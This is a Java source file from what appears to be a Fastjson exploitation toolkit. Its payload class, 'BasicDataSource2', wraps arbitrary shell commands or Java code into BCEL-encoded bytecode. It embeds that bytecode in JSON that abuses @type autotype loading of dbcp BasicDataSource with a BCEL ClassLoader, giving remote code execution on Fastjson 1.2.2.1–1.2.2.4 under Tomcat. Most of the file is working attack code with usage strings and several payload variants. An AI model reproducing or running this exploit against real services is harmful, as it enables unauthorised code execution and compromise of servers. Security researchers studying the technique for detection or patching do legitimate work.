package payloads;

import com.alibaba.fastjson.JSON;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import gadget.Gadget;
import payloads.annotation.Dependencies;
import payloads.annotation.PayloadType;
import payloads.annotation.VulVersion;
import util.JarFileReader;

/*
* 只能在tomcat环境
* tomcat-dbcp:9.0.8不成功
* 还依赖commons-dbcp
* */

// 需pom.xml文件中dbcp版本切换成9.x
// 基于 org.apache.tomcat.dbcp.dbcp2.BasicDataSource
// 关于dbcp不带2的是低版本的用法，例如7.0.0
// org.apache.tomcat.dbcp.dbcp.BasicDataSource
// 最终使用的是
// org.apache.commons.dbcp.BasicDataSource

@PayloadType({PayloadType.LOCAL})
@VulVersion({"1.2.2.1-1.2.2.4"})
@Dependencies({"tomcat-dbcp:tomcat-dbcp:7.x","tomcat-dbcp:tomcat-dbcp:9.x","commons-dbcp:commons-dbcp:1.4"})
public class BasicDataSource2 implements ObjectPayload {
    @Override
    public void process(String[] args) {
        if(args.length != 2 && args.length != 3){
            System.out.println("[*] Usage: java -jar FastjsonExploit-[version].jar BasicDataSource2 \"[cmd:xxx|code:xxx.java]\"");
            return;
        }

        try{
            String command = args[1].trim();
            JarFileReader jsr = new JarFileReader();
            String payload = jsr.read("BasicDataSource2.tpl");
            byte[] byteCode = Gadget.getBasicDataSource1ExpCode(command);
            String classname = Utility.encode(byteCode,true);
            classname = "$$BCEL$$"+classname;
            payload = payload.replace("###EVIL_CODE###", classname);
            System.out.println("[*] payload build success!");
            System.out.println("\n" + payload + "\n");

            if(args.length == 3 && args[2].equals("-exec")){
                System.out.println("[*] Try local parsing");
                JSON.parseObject(payload);
            }
        }catch (Exception e){
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        if(args.length != 1 && args.length != 2){
            System.out.println("[*] Usge: java -cp FastjsonExploit-<version>.jar payloads.BasicDataSource2 <rmi/ldap address>");
            return;
        }

        String command = args[0].trim();
        System.out.println(command);

        try {

           String payload2 = "{{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"c\":{\"@type\":\"org.apache.tomcat.dbcp.dbcp.BasicDataSource\",\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"xxxxxxxxxx\"}}:\"ddd\"}";
//            payload2 = "{\n" +
//                    "  \"@type\" : \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\",\n" +
//                    "  \"driverClassLoader\" :\n" +
//                    "  {\n" +
//                    "    \"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
//                    "  },\n" +
//                    "  \"driverClassName\" : \"xxxxxxxxxx\"\n" +
//                    "}";



//            String payload2 = "{\n" +
//                    "  \"@type\": \"org.apache.commons.dbcp.BasicDataSource\",\n" +
//                    "  \"driverClassLoader\": {\n" +
//                    "    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
//                    "  },\n" +
//                    "  \"driverClassName\": \"xxxxxxxxxx\"\n" +
//                    "}";
            //payload2 = "{{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"c\":{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"xxxxxxxxxx\"}}:\"ddd\"}";
          //payload2 = "{{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"c\":{\"@type\":\"org.apache.commons.dbcp.BasicDataSource\",\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"xxxxxxxxxx\"}}:\"ddd\"}";

            payload2 = "{{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"c\":{\"@type\":\"org.apache.commons.dbcp.BasicDataSource\",\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"xxxxxxxxxx\"}}:\"ddd\"}";

            byte[] byteCode = Gadget.getBasicDataSource1ExpCode(command);
            String classname = Utility.encode(byteCode,true);
            classname = "$$BCEL$$"+classname;
            payload2 = payload2.replace("xxxxxxxxxx", classname);
            System.out.println(payload2);

            if(args.length == 2 && args[1].equals("-exec")){
                System.out.println("[*] Try local parsing");
                JSON.parseObject(payload2);
                //JSONObject.parseObject(payload2);
            }
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}
